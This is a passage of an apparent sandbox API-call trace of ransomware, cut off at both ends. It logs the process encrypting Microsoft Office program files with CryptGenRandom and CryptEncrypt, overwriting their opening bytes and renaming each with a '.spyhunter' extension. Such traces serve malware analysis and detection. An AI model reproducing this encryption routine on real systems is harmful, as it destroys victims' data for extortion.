lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0103.324] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.324] WriteFile (in: hFile=0x16c, lpBuffer=0x248fbcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb8c, lpOverlapped=0x0 | out: lpBuffer=0x248fbcc*, lpNumberOfBytesWritten=0x248fb8c*=0x4, lpOverlapped=0x0) returned 1 [0103.324] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb8c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb8c*=0x30, lpOverlapped=0x0) returned 1 [0103.325] CloseHandle (hObject=0x16c) returned 1 [0103.325] GetProcessHeap () returned 0x2c0000 [0103.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0103.326] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK.spyhunter") returned 75 [0103.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\OIS_F_COL.HXK.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\ois_f_col.hxk.spyhunter")) returned 1 [0103.327] GetProcessHeap () returned 0x2c0000 [0103.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0103.336] GetProcessHeap () returned 0x2c0000 [0103.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0103.336] GetProcessHeap () returned 0x2c0000 [0103.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca7c58 | out: hHeap=0x2c0000) returned 1 [0103.336] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbd0 | out: pbBuffer=0x248fbd0) returned 1 [0103.336] GetProcessHeap () returned 0x2c0000 [0103.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0103.336] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbc8*=0x30) returned 1 [0103.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubcolor.scm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0103.373] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM") returned 64 [0103.373] StrStrW (lpFirst="PUBCOLOR.SCM", lpSrch=".txt") returned 0x0 [0103.373] GetProcessHeap () returned 0x2c0000 [0103.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0103.373] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fb8c*=0x2800, lpOverlapped=0x0) returned 1 [0103.423] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.423] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fb8c*=0x2800, lpOverlapped=0x0) returned 1 [0103.423] GetProcessHeap () returned 0x2c0000 [0103.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0103.424] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.424] WriteFile (in: hFile=0xec, lpBuffer=0x248fbcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb8c, lpOverlapped=0x0 | out: lpBuffer=0x248fbcc*, lpNumberOfBytesWritten=0x248fb8c*=0x4, lpOverlapped=0x0) returned 1 [0103.424] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb8c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb8c*=0x30, lpOverlapped=0x0) returned 1 [0103.424] CloseHandle (hObject=0xec) returned 1 [0103.424] GetProcessHeap () returned 0x2c0000 [0103.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0103.424] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM.spyhunter") returned 74 [0103.424] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubcolor.scm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBCOLOR.SCM.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubcolor.scm.spyhunter")) returned 1 [0103.748] GetProcessHeap () returned 0x2c0000 [0103.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0103.748] GetProcessHeap () returned 0x2c0000 [0103.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0103.748] GetProcessHeap () returned 0x2c0000 [0103.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca9178 | out: hHeap=0x2c0000) returned 1 [0103.748] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbc8 | out: pbBuffer=0x248fbc8) returned 1 [0103.748] GetProcessHeap () returned 0x2c0000 [0103.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0103.748] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbc0*=0x30) returned 1 [0103.749] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLTS.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchlts.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0103.749] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLTS.DAT") returned 64 [0103.749] StrStrW (lpFirst="PSRCHLTS.DAT", lpSrch=".txt") returned 0x0 [0103.749] GetProcessHeap () returned 0x2c0000 [0103.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0103.749] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248fb84*=0x2800, lpOverlapped=0x0) returned 1 [0104.172] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.173] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb84, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248fb84*=0x2800, lpOverlapped=0x0) returned 1 [0104.173] GetProcessHeap () returned 0x2c0000 [0104.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0104.173] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.173] WriteFile (in: hFile=0xec, lpBuffer=0x248fbc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb84, lpOverlapped=0x0 | out: lpBuffer=0x248fbc4*, lpNumberOfBytesWritten=0x248fb84*=0x4, lpOverlapped=0x0) returned 1 [0104.224] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb84, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb84*=0x30, lpOverlapped=0x0) returned 1 [0104.224] CloseHandle (hObject=0xec) returned 1 [0104.231] GetProcessHeap () returned 0x2c0000 [0104.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0104.233] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLTS.DAT.spyhunter") returned 74 [0104.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLTS.DAT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchlts.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\PSRCHLTS.DAT.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\psrchlts.dat.spyhunter")) returned 1 [0104.264] GetProcessHeap () returned 0x2c0000 [0104.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0104.264] GetProcessHeap () returned 0x2c0000 [0104.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0104.264] GetProcessHeap () returned 0x2c0000 [0104.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca8e38 | out: hHeap=0x2c0000) returned 1 [0104.264] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbc8 | out: pbBuffer=0x248fbc8) returned 1 [0104.264] GetProcessHeap () returned 0x2c0000 [0104.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0104.265] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbc0*=0x30) returned 1 [0104.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadataresource.xsd" (normalized: "c:\\program files\\microsoft office\\office14\\bdcmetadataresource.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0104.265] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadataresource.xsd") returned 70 [0104.265] StrStrW (lpFirst="bdcmetadataresource.xsd", lpSrch=".txt") returned 0x0 [0104.265] GetProcessHeap () returned 0x2c0000 [0104.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0104.265] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb84*=0x2800, lpOverlapped=0x0) returned 1 [0104.296] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.297] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb84, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb84*=0x2800, lpOverlapped=0x0) returned 1 [0104.297] GetProcessHeap () returned 0x2c0000 [0104.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0104.297] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.297] WriteFile (in: hFile=0xec, lpBuffer=0x248fbc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb84, lpOverlapped=0x0 | out: lpBuffer=0x248fbc4*, lpNumberOfBytesWritten=0x248fb84*=0x4, lpOverlapped=0x0) returned 1 [0104.305] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb84, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb84*=0x30, lpOverlapped=0x0) returned 1 [0104.305] CloseHandle (hObject=0xec) returned 1 [0104.306] GetProcessHeap () returned 0x2c0000 [0104.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0104.306] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadataresource.xsd.spyhunter") returned 80 [0104.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadataresource.xsd" (normalized: "c:\\program files\\microsoft office\\office14\\bdcmetadataresource.xsd"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\bdcmetadataresource.xsd.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\bdcmetadataresource.xsd.spyhunter")) returned 1 [0104.311] GetProcessHeap () returned 0x2c0000 [0104.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0104.312] GetProcessHeap () returned 0x2c0000 [0104.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0104.312] GetProcessHeap () returned 0x2c0000 [0104.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9d4a0 | out: hHeap=0x2c0000) returned 1 [0104.313] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbc0 | out: pbBuffer=0x248fbc0) returned 1 [0104.313] GetProcessHeap () returned 0x2c0000 [0104.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0104.313] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbb8*=0x30) returned 1 [0104.313] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe" (normalized: "c:\\program files\\microsoft office\\office14\\bcssync.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0104.313] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe") returned 58 [0104.313] StrStrW (lpFirst="BCSSync.exe", lpSrch=".txt") returned 0x0 [0104.313] GetProcessHeap () returned 0x2c0000 [0104.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0104.314] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb7c*=0x2800, lpOverlapped=0x0) returned 1 [0104.344] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.344] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb7c*=0x2800, lpOverlapped=0x0) returned 1 [0104.344] GetProcessHeap () returned 0x2c0000 [0104.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0104.344] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.344] WriteFile (in: hFile=0xec, lpBuffer=0x248fbbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb7c, lpOverlapped=0x0 | out: lpBuffer=0x248fbbc*, lpNumberOfBytesWritten=0x248fb7c*=0x4, lpOverlapped=0x0) returned 1 [0104.354] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb7c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb7c*=0x30, lpOverlapped=0x0) returned 1 [0104.354] CloseHandle (hObject=0xec) returned 1 [0104.406] GetProcessHeap () returned 0x2c0000 [0104.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0104.407] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe.spyhunter") returned 68 [0104.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe" (normalized: "c:\\program files\\microsoft office\\office14\\bcssync.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\BCSSync.exe.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\bcssync.exe.spyhunter")) returned 1 [0104.868] GetProcessHeap () returned 0x2c0000 [0104.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0104.868] GetProcessHeap () returned 0x2c0000 [0104.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0104.868] GetProcessHeap () returned 0x2c0000 [0104.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34db98 | out: hHeap=0x2c0000) returned 1 [0104.868] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbc0 | out: pbBuffer=0x248fbc0) returned 1 [0104.868] GetProcessHeap () returned 0x2c0000 [0104.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0104.869] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbb8*=0x30) returned 1 [0104.869] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll" (normalized: "c:\\program files\\microsoft office\\office14\\contactpicker.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0104.910] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll") returned 64 [0104.910] StrStrW (lpFirst="ContactPicker.dll", lpSrch=".txt") returned 0x0 [0104.910] GetProcessHeap () returned 0x2c0000 [0104.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0104.910] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248fb7c*=0x2800, lpOverlapped=0x0) returned 1 [0105.089] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.316] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248fb7c*=0x2800, lpOverlapped=0x0) returned 1 [0105.317] GetProcessHeap () returned 0x2c0000 [0105.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0105.317] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.317] WriteFile (in: hFile=0xb4, lpBuffer=0x248fbbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb7c, lpOverlapped=0x0 | out: lpBuffer=0x248fbbc*, lpNumberOfBytesWritten=0x248fb7c*=0x4, lpOverlapped=0x0) returned 1 [0105.501] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb7c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb7c*=0x30, lpOverlapped=0x0) returned 1 [0105.501] CloseHandle (hObject=0xb4) returned 1 [0105.501] GetProcessHeap () returned 0x2c0000 [0105.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0105.502] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll.spyhunter") returned 74 [0105.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll" (normalized: "c:\\program files\\microsoft office\\office14\\contactpicker.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\ContactPicker.dll.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\contactpicker.dll.spyhunter")) returned 1 [0105.503] GetProcessHeap () returned 0x2c0000 [0105.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0105.503] GetProcessHeap () returned 0x2c0000 [0105.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0105.503] GetProcessHeap () returned 0x2c0000 [0105.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cabbb8 | out: hHeap=0x2c0000) returned 1 [0105.503] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbb8 | out: pbBuffer=0x248fbb8) returned 1 [0105.503] GetProcessHeap () returned 0x2c0000 [0105.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0105.503] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248fbb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248fbb0*=0x30) returned 1 [0105.504] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\form.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0105.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL") returned 55 [0105.505] StrStrW (lpFirst="FORM.DLL", lpSrch=".txt") returned 0x0 [0105.505] GetProcessHeap () returned 0x2c0000 [0105.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0105.505] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fb74*=0x2800, lpOverlapped=0x0) returned 1 [0105.620] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0105.620] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb74, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fb74*=0x2800, lpOverlapped=0x0) returned 1 [0105.620] GetProcessHeap () returned 0x2c0000 [0105.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0105.620] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.620] WriteFile (in: hFile=0xb4, lpBuffer=0x248fbb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb74, lpOverlapped=0x0 | out: lpBuffer=0x248fbb4*, lpNumberOfBytesWritten=0x248fb74*=0x4, lpOverlapped=0x0) returned 1 [0105.631] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb74, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248fb74*=0x30, lpOverlapped=0x0) returned 1 [0105.631] CloseHandle (hObject=0xb4) returned 1 [0105.631] GetProcessHeap () returned 0x2c0000 [0105.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0105.631] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL.spyhunter") returned 65 [0105.631] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\form.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\FORM.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\form.dll.spyhunter")) returned 1 [0105.632] GetProcessHeap () returned 0x2c0000 [0105.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0105.632] GetProcessHeap () returned 0x2c0000 [0105.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0105.632] GetProcessHeap () returned 0x2c0000 [0105.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329e90 | out: hHeap=0x2c0000) returned 1 [0105.632] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fbb8 | out: pbBuffer=0x248fbb8) returned 1 [0105.633] GetProcessHeap () returned 0x2c0000 [0105.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0105.633] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, 